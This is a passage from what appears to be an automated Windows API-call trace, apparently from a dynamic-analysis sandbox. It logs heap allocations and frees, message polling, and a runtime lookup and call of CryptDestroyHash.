(HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0130.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0130.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0130.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0130.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0130.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0130.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0130.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0130.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0130.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0130.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0130.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0130.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0130.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0130.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0130.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0130.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0130.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0130.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0130.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0130.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0130.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0130.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0130.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0130.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0130.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0130.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0130.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0130.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0130.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0130.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0130.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0130.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0130.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0130.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0130.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0130.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0130.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0130.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0130.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0130.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0130.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c08 | out: hHeap=0x970000) returned 1 [0130.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0130.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0130.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0130.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0130.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0130.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0130.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0130.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0130.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0130.361] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0130.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0130.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0130.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0130.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0130.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0130.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0130.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0130.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0130.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0130.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0130.361] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0130.362] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0130.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0130.362] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0130.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0130.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0130.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0130.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0130.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0130.362] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0130.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0130.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0130.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0130.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0130.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0130.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0130.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0130.362] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0130.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0130.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0130.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0130.362] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0130.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0130.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0130.362] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0130.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0130.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0130.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0130.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0130.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507b8 [0130.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0130.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508c0 [0130.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0130.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508d8 [0130.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0130.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0130.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50938 [0130.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0130.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50968 [0130.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0130.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50998 [0130.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0130.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0130.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509b0 [0130.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0130.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0130.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0130.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0130.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50c08 [0130.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ae8 [0130.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0130.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50c20 [0130.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50b30 [0130.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0130.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0130.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0130.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ffb8 [0130.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0130.364] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0130.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ffb8 | out: hHeap=0x970000) returned 1 [0130.364] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0130.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509c8 [0130.364] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0130.364] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0130.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0130.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0130.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0130.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0130.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0130.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0130.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0130.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0130.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0130.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0130.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0130.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0130.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0130.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0130.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0130.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0130.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0130.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0130.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0130.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0130.365] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0130.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0130.365] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0130.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0130.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0130.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0130.366] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0130.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0130.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0130.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0130.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0130.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0130.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0130.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0130.366] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0130.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0130.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0130.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0130.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0130.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0130.366] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0130.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0130.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0130.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0130.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0130.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0130.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0130.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0130.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69928 [0130.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69928, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0130.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0130.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0130.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0130.367] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0130.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0130.367] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0130.367] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0130.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0130.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0130.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0130.368] CryptDestroyHash (hHash=0xa86f90) returned 1 [0130.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0130.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0130.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0130.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0130.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0130.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0130.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0130.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0130.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0130.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0130.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0130.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0130.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0130.368] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0130.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0130.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0130.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0130.368] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0130.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0130.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0130.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0130.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0130.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0130.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0130.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0130.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0130.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0130.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0130.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0130.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0130.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0130.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0130.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0130.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0130.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0130.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0130.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0130.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0130.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0130.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0130.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0130.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0130.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0130.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0130.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0130.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0130.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0130.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0130.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0130.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0130.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0130.370] HeapFree (in: hHeap=0x970000, 